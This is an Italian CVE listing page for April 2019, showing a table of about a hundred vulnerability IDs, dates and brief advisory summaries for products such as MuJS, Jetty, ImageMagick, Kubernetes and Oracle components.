Lista CVE - 2019 / Aprile
Visualizzazione 1001 - 1100 di 1531 CVE per Aprile 2019 (Pagina 11 di 16)
| ID CVE | Data | Titolo |
|---|---|---|
| CVE-2019-11412 | 2019-04-21 | An issue was discovered in Artifex MuJS 1.0.5. jscompile.c can cause a denial of service (invalid stack-frame jump) because it lacks an ENDTRY opcode call. |
| CVE-2019-11413 | 2019-04-21 | An issue was discovered in Artifex MuJS 1.0.5. It has unlimited recursion because the match function in regexp.c lacks a depth check. |
| CVE-2019-11414 | 2019-04-21 | An issue was discovered on Intelbras IWR 3000N 1.5.0 devices. When the administrator password is changed from a certain client IP address, administrative authorization remains available to any client at... |
| CVE-2019-11415 | 2019-04-21 | An issue was discovered on Intelbras IWR 3000N 1.5.0 devices. A malformed login request allows remote attackers to cause a denial of service (reboot), as demonstrated by JSON misparsing of... |
| CVE-2019-11416 | 2019-04-21 | A CSRF issue was discovered on Intelbras IWR 3000N 1.5.0 devices, leading to complete control of the router, as demonstrated by v1/system/user. |
| CVE-2018-20818 | 2019-04-21 | A buffer overflow vulnerability was discovered in the OpenPLC controller, in the OpenPLC_v2 and OpenPLC_v3 versions. It occurs in the modbus.cpp mapUnusedIO() function, which can cause a runtime crash of... |
| CVE-2019-11417 | 2019-04-21 | system.cgi on TRENDnet TV-IP110WN cameras has a buffer overflow caused by an inadequate source-length check before a strcpy operation in the respondAsp function. Attackers can exploit the vulnerability by using... |
| CVE-2019-11418 | 2019-04-21 | apply.cgi on the TRENDnet TEW-632BRP 1.010B32 router has a buffer overflow via long strings to the SOAPACTION:HNAP1 interface. |
| CVE-2019-11426 | 2019-04-21 | An XSS issue was discovered in app/admincp/template/admincp.header.php in idreamsoft iCMS 7.0.14 via the admincp.php?app=config tab parameter. |
| CVE-2019-11427 | 2019-04-21 | An XSS issue was discovered in app/search/search.app.php in idreamsoft iCMS 7.0.14 via the public/api.php?app=search q parameter. |
| CVE-2019-11428 | 2019-04-21 | I, Librarian 4.10 has XSS via the export.php export_files parameter. |
| CVE-2019-11444 | 2019-04-22 | An issue was discovered in Liferay Portal CE 7.1.2 GA3. An attacker can use Liferay's Groovy script console to execute OS commands. Commands can be executed via a [command].execute() call,... |
| CVE-2019-11445 | 2019-04-22 | OpenKM 6.3.2 through 6.3.7 allows an attacker to upload a malicious JSP file into the /okm:root directories and move that file to the home directory of the site, via frontend/FileUpload... |
| CVE-2019-11446 | 2019-04-22 | An issue was discovered in ATutor through 2.2.4. It allows the user to run commands on the server with the teacher user privilege. The Upload Files section in the File... |
| CVE-2019-11447 | 2019-04-22 | An issue was discovered in CutePHP CuteNews 2.1.2. An attacker can infiltrate the server through the avatar upload process in the profile area via the avatar_file field to index.php?mod=main&opt=personal. There... |
| CVE-2019-11448 | 2019-04-22 | An issue was discovered in Zoho ManageEngine Applications Manager 11.0 through 14.0. An unauthenticated user can gain the authority of SYSTEM on the server due to a Popup_SLA.jsp sid SQL... |
| CVE-2019-11449 | 2019-04-22 | I, Librarian 4.10 has XSS via the notes.php notes parameter. |
| CVE-2019-11450 | 2019-04-22 | whatsns 4.0 allows index.php?question/ajaxadd.html title SQL injection. |
| CVE-2019-11451 | 2019-04-22 | whatsns 4.0 allows index.php?inform/add.html qid SQL injection. |
| CVE-2019-11452 | 2019-04-22 | whatsns 4.0 allows index.php?admin_category/remove.html cid[] SQL injection. |
| CVE-2019-11243 | 2019-04-22 | In Kubernetes v1.12.0-v1.12.4 and v1.13.0, the rest.AnonymousClientConfig() method returns a copy of the provided config, with credentials removed (bearer token, username/password, and client certificate/key data). In the affected versions, rest.AnonymousClientConfig()... |
| CVE-2019-11244 | 2019-04-22 | kubectl creates world-writeable cached schema files |
| CVE-2019-11454 | 2019-04-22 | Persistent cross-site scripting (XSS) in http/cervlet.c in Tildeslash Monit before 5.25.3 allows a remote unauthenticated attacker to introduce arbitrary JavaScript via manipulation of an unsanitized user field of the Authorization... |
| CVE-2019-11455 | 2019-04-22 | A buffer over-read in Util_urlDecode in util.c in Tildeslash Monit before 5.25.3 allows a remote authenticated attacker to retrieve the contents of adjacent memory via manipulation of GET or POST... |
| CVE-2019-3899 | 2019-04-22 | It was found that default configuration of Heketi does not require any authentication potentially exposing the management interface to misuse. This isue only affects heketi as shipped with Openshift Container... |
| CVE-2019-6155 | 2019-04-22 | A potential vulnerability was found in an SMI handler in various BIOS versions of certain legacy IBM System x and IBM BladeCenter systems that could lead to denial of service. |
| CVE-2019-6157 | 2019-04-22 | In various firmware versions of Lenovo System x, the integrated management module II (IMM2)'s first failure data capture (FFDC) includes the web server's private key in the generated log file... |
| CVE-2019-3901 | 2019-04-22 | A race condition in perf_event_open() allows local attackers to leak sensitive data from setuid programs. As no relevant locks (in particular the cred_guard_mutex) are held during the ptrace_may_access() call, it... |
| CVE-2019-3902 | 2019-04-22 | A flaw was found in Mercurial before 4.9. It was possible to use symlinks and subrepositories to defeat Mercurial's path-checking logic and write files outside a repository. |
| CVE-2019-11456 | 2019-04-22 | Gila CMS 1.10.1 allows fm/save CSRF for executing arbitrary PHP code. |
| CVE-2011-1830 | 2019-04-22 | Ekiga attempts to dlopen /tmp/ekiga_test.so |
| CVE-2011-3145 | 2019-04-22 | mount.ecrpytfs_private sets group owner of /etc/mtab to user's primary group |
| CVE-2011-3147 | 2019-04-22 | qcow format could expose host filesystem information |
| CVE-2011-3151 | 2019-04-22 | SELinux initscript misuse of touch |
| CVE-2014-1426 | 2019-04-22 | get_file_by_name does not check owner |
| CVE-2014-1427 | 2019-04-22 | MAAS API vulnerable to CSRF attack |
| CVE-2014-1428 | 2019-04-22 | uuid.uuid1() is not suitable as an unguessable identifier/token |
| CVE-2015-1316 | 2019-04-22 | Juju Joyent provider uploads user's private ssh key by default |
| CVE-2015-1320 | 2019-04-22 | Probe-and-enlist for SeaMicro chassis writes password to the log |
| CVE-2015-1326 | 2019-04-22 | python-dbusmock arbitrary code execution or file overwrite when templates are loaded from /tmp |
| CVE-2015-1327 | 2019-04-22 | Content-hub DBUS API doesn't prevent confined apps from passing paths to files without access |
| CVE-2015-1340 | 2019-04-22 | chmod race in doUidshiftIntoContainer |
| CVE-2015-1341 | 2019-04-22 | Apport privilege escalation through Python module imports |
| CVE-2015-1343 | 2019-04-22 | unity-scope-gdrive search feature logs search terms to syslog |
| CVE-2016-1573 | 2019-04-22 | Using a specially crafted fallback art property, scopes can execute arbitrary QML code in context of unity8-dash |
| CVE-2016-1579 | 2019-04-22 | UDM doesn't check for confinement before running post-processing commands |
| CVE-2016-1584 | 2019-04-22 | Unity8 converged application lifecycle allows background applications to use on-screen keyboard when not top-most |
| CVE-2016-1585 | 2019-04-22 | AppArmor mount rules grant excessive permissions |
| CVE-2016-1586 | 2019-04-22 | A malicious webview could install long-lived unload handlers that re-use an incognito BrowserContext that is queued for destruction in versions of Oxide before 1.18.3. |
| CVE-2016-1587 | 2019-04-22 | The Snapweb interface before version 0.21.2 was exposing controls to install or remove snap packages without controlling the identity of the user, nor the origin of the connection. An attacker... |
| CVE-2019-9955 | 2019-04-22 | On Zyxel ATP200, ATP500, ATP800, USG20-VPN, USG20W-VPN, USG40, USG40W, USG60, USG60W, USG110, USG210, USG310, USG1100, USG1900, USG2200-VPN, ZyWALL 110, ZyWALL 310, ZyWALL 1100 devices, the security firewall login page is... |
| CVE-2019-10241 | 2019-04-22 | In Eclipse Jetty version 9.2.26 and older, 9.3.25 and older, and 9.4.15 and older, the server is vulnerable to XSS conditions if a remote client USES a specially formatted URL... |
| CVE-2019-10246 | 2019-04-22 | In Eclipse Jetty version 9.2.27, 9.3.26, and 9.4.16, the server running on Windows is vulnerable to exposure of the fully qualified Base Resource directory name on Windows to a remote... |
| CVE-2019-10247 | 2019-04-22 | In Eclipse Jetty version 7.x, 8.x, 9.2.27 and older, 9.3.26 and older, and 9.4.16 and older, the server running on any OS and Jetty version combination will reveal the configured... |
| CVE-2019-10248 | 2019-04-22 | Eclipse Vorto versions prior to 0.11 resolved Maven build artifacts for the Xtext project over HTTP instead of HTTPS. Any of these dependent artifacts could have been maliciously compromised by... |
| CVE-2019-11459 | 2019-04-22 | The tiff_document_render() and tiff_document_get_thumbnail() functions in the TIFF document backend in GNOME Evince through 3.32.0 did not handle errors from TIFFReadRGBAImageOriented(), leading to uninitialized memory use when processing certain TIFF... |
| CVE-2019-11460 | 2019-04-22 | An issue was discovered in GNOME gnome-desktop 3.26, 3.28, and 3.30 prior to 3.30.2.2, and 3.32 prior to 3.32.1.1. A compromised thumbnailer may escape the bubblewrap sandbox used to confine... |
| CVE-2019-11461 | 2019-04-22 | An issue was discovered in GNOME Nautilus 3.30 prior to 3.30.6 and 3.32 prior to 3.32.1. A compromised thumbnailer may escape the bubblewrap sandbox used to confine thumbnailers by using... |
| CVE-2019-5427 | 2019-04-22 | c3p0 version < 0.9.5.4 may be exploited by a billion laughs attack when loading XML configuration due to missing protections against recursive entity expansion when loading configuration. |
| CVE-2019-11384 | 2019-04-22 | The Zalora application 6.15.1 for Android stores confidential information insecurely on the system (i.e. plain text), which allows a non-root user to find out the username/password of a valid user... |
| CVE-2019-11383 | 2019-04-22 | An issue was discovered in the Medha WiFi FTP Server application 1.8.3 for Android. An attacker can read the username/password of a valid user via /data/data/com.medhaapps.wififtpserver/shared_prefs/com.medhaapps.wififtpserver_preferences.xml |
| CVE-2019-0218 | 2019-04-22 | A vulnerability was discovered wherein a specially crafted URL could enable reflected XSS via JavaScript in the pony mail interface. |
| CVE-2019-8452 | 2019-04-22 | A hard-link created from log file archive of Check Point ZoneAlarm up to 15.4.062 or Check Point Endpoint Security client for Windows before E80.96 to any file on the system... |
| CVE-2019-11463 | 2019-04-23 | A memory leak in archive_read_format_zip_cleanup in archive_read_support_format_zip.c in libarchive 3.3.4-dev allows remote attackers to cause a denial of service via a crafted ZIP file because of a HAVE_LZMA_H typo. NOTE:... |
| CVE-2013-7470 | 2019-04-23 | cipso_v4_validate in include/net/cipso_ipv4.h in the Linux kernel before 3.11.7, when CONFIG_NETLABEL is disabled, allows attackers to cause a denial of service (infinite loop and crash), as demonstrated by icmpsic, a... |
| CVE-2019-11469 | 2019-04-23 | Zoho ManageEngine Applications Manager 12 through 14 allows FaultTemplateOptions.jsp resourceid SQL injection. Subsequently, an unauthenticated user can gain the authority of SYSTEM on the server by uploading a malicious file... |
| CVE-2018-17169 | 2019-04-23 | An XML external entity (XXE) vulnerability in PrinterOn version 4.1.4 and lower allows remote authenticated users to read arbitrary files or conduct server-side request forgery (SSRF) attacks via a crafted... |
| CVE-2018-20819 | 2019-04-23 | io/ZlibCompression.cc in the decompression component in Dropbox Lepton 1.2.1 allows attackers to cause a denial of service (heap-based buffer overflow and application crash) or possibly have unspecified other impact by... |
| CVE-2018-20820 | 2019-04-23 | read_ujpg in jpgcoder.cc in Dropbox Lepton 1.2.1 allows attackers to cause a denial-of-service (application runtime crash because of an integer overflow) via a crafted file. |
| CVE-2018-20821 | 2019-04-23 | The parsing component in LibSass through 3.5.5 allows attackers to cause a denial-of-service (uncontrolled recursion in Sass::Parser::parse_css_variable_value in parser.cpp). |
| CVE-2018-20822 | 2019-04-23 | LibSass 3.5.4 allows attackers to cause a denial-of-service (uncontrolled recursion in Sass::Complex_Selector::perform in ast.hpp and Sass::Inspect::operator in inspect.cpp). |
| CVE-2019-11470 | 2019-04-23 | The cineon parsing component in ImageMagick 7.0.8-26 Q16 allows attackers to cause a denial-of-service (uncontrolled resource consumption) by crafting a Cineon image with an incorrect claimed image size. This occurs... |
| CVE-2019-11471 | 2019-04-23 | libheif 1.4.0 has a use-after-free in heif::HeifContext::Image::set_alpha_channel in heif_context.h because heif_context.cc mishandles references to non-existing alpha images. |
| CVE-2019-11472 | 2019-04-23 | ReadXWDImage in coders/xwd.c in the XWD image parsing component of ImageMagick 7.0.8-41 Q16 allows attackers to cause a denial-of-service (divide-by-zero error) by crafting an XWD image file in which the... |
| CVE-2019-11473 | 2019-04-23 | coders/xwd.c in GraphicsMagick 1.3.31 allows attackers to cause a denial of service (out-of-bounds read and application crash) by crafting an XWD image file, a different vulnerability than CVE-2019-11008 and CVE-2019-11009. |
| CVE-2019-11474 | 2019-04-23 | coders/xwd.c in GraphicsMagick 1.3.31 allows attackers to cause a denial of service (floating-point exception and application crash) by crafting an XWD image file, a different vulnerability than CVE-2019-11008 and CVE-2019-11009. |
| CVE-2017-12619 | 2019-04-23 | Apache Zeppelin prior to 0.7.3 was vulnerable to session fixation which allowed an attacker to hijack a valid user session. Issue was reported by "stone lone". |
| CVE-2018-1317 | 2019-04-23 | In Apache Zeppelin prior to 0.8.0 the cron scheduler was enabled by default and could allow users to run paragraphs as other users without authentication. |
| CVE-2018-1328 | 2019-04-23 | Apache Zeppelin prior to 0.8.0 had a stored XSS issue via Note permissions. Issue reported by "Josna Joseph". |
| CVE-2019-0223 | 2019-04-23 | While investigating bug PROTON-2014, we discovered that under some circumstances Apache Qpid Proton versions 0.9 to 0.27.0 (C library and its language bindings) can connect to a peer anonymously using... |
| CVE-2019-7303 | 2019-04-23 | Snapd seccomp filter TIOCSTI ioctl bypass |
| CVE-2019-7304 | 2019-04-23 | Local privilege escalation via snapd socket |
| CVE-2019-11076 | 2019-04-23 | Cribl UI 1.5.0 allows remote attackers to run arbitrary commands via an unauthenticated web request. |
| CVE-2019-10864 | 2019-04-23 | The WP Statistics plugin through 12.6.2 for WordPress has XSS, allowing a remote attacker to inject arbitrary web script or HTML via the Referer header of a GET request. |
| CVE-2018-2880 | 2019-04-23 | Vulnerability in the MICROS Retail-J component of Oracle Retail Applications (subcomponent: Back Office). The supported version that is affected is 12.1.2. Easily exploitable vulnerability allows unauthenticated attacker with network access... |
| CVE-2018-3120 | 2019-04-23 | Vulnerability in the MICROS Lucas component of Oracle Retail Applications (subcomponent: Security). Supported versions that are affected are 2.9.5.6 and 2.9.5.7. Difficult to exploit vulnerability allows low privileged attacker with... |
| CVE-2018-3123 | 2019-04-23 | Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: libmysqld). Supported versions that are affected are 5.6.42 and prior, 5.7.24 and prior and 8.0.13 and prior. Difficult to... |
| CVE-2018-3312 | 2019-04-23 | Vulnerability in the Oracle Retail Customer Engagement component of Oracle Retail Applications (subcomponent: Segment). Supported versions that are affected are 16.0 and 17.0. Difficult to exploit vulnerability allows high privileged... |
| CVE-2018-3314 | 2019-04-23 | Vulnerability in the MICROS Relate CRM Software component of Oracle Retail Applications (subcomponent: Customer). The supported version that is affected is 11.4. Difficult to exploit vulnerability allows low privileged attacker... |
| CVE-2019-2424 | 2019-04-23 | Vulnerability in the Oracle Retail Convenience Store Back Office component of Oracle Retail Applications (subcomponent: Level 3 Maintenance Functions). The supported version that is affected is 3.6. Easily exploitable vulnerability... |
| CVE-2019-2516 | 2019-04-23 | Vulnerability in the Portable Clusterware component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1 and 18c. Easily exploitable vulnerability allows high privileged attacker having Grid... |
| CVE-2019-2517 | 2019-04-23 | Vulnerability in the Core RDBMS component of Oracle Database Server. Supported versions that are affected are 12.2.0.1 and 18c. Easily exploitable vulnerability allows high privileged attacker having DBFS_ROLE privilege with... |
| CVE-2019-2518 | 2019-04-23 | Vulnerability in the Java VM component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c and 19c. Difficult to exploit vulnerability allows low privileged attacker... |
| CVE-2019-2551 | 2019-04-23 | Vulnerability in the Oracle One-to-One Fulfillment component of Oracle E-Business Suite (subcomponent: Print Server). Supported versions that are affected are 12.1.1, 12.1.2, 12.1.3, 12.2.3, 12.2.4, 12.2.5, 12.2.6, 12.2.7 and 12.2.8.... |
| CVE-2019-2557 | 2019-04-23 | Vulnerability in the Oracle Application Testing Suite component of Oracle Enterprise Manager Products Suite (subcomponent: Load Testing for Web Apps). The supported version that is affected is 13.3.0.1. Easily exploitable... |
| CVE-2019-2558 | 2019-04-23 | Vulnerability in the Oracle Retail Point-of-Service component of Oracle Retail Applications (subcomponent: Infrastructure). Supported versions that are affected are 13.4, 14.0 and 14.1. Easily exploitable vulnerability allows unauthenticated attacker with... |
| CVE-2019-2564 | 2019-04-23 | Vulnerability in the JD Edwards EnterpriseOne Tools component of Oracle JD Edwards Products (subcomponent: Web Runtime). The supported version that is affected is 9.2. Easily exploitable vulnerability allows low privileged... |
| CVE-2019-2565 | 2019-04-23 | Vulnerability in the JD Edwards World Technical Foundation component of Oracle JD Edwards Products (subcomponent: Service Enablement). Supported versions that are affected are A9.2, A9.3.1 and A9.4. Easily exploitable vulnerability... |
| CVE-2019-2566 | 2019-04-23 | Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Audit Plug-in). Supported versions that are affected are 5.7.25 and prior and 8.0.15 and prior. Easily exploitable vulnerability allows... |
| CVE-2019-2567 | 2019-04-23 | Vulnerability in the Oracle Configurator component of Oracle Supply Chain Products Suite (subcomponent: Active Model Generation). Supported versions that are affected are 12.1 and 12.2. Easily exploitable vulnerability allows unauthenticated... |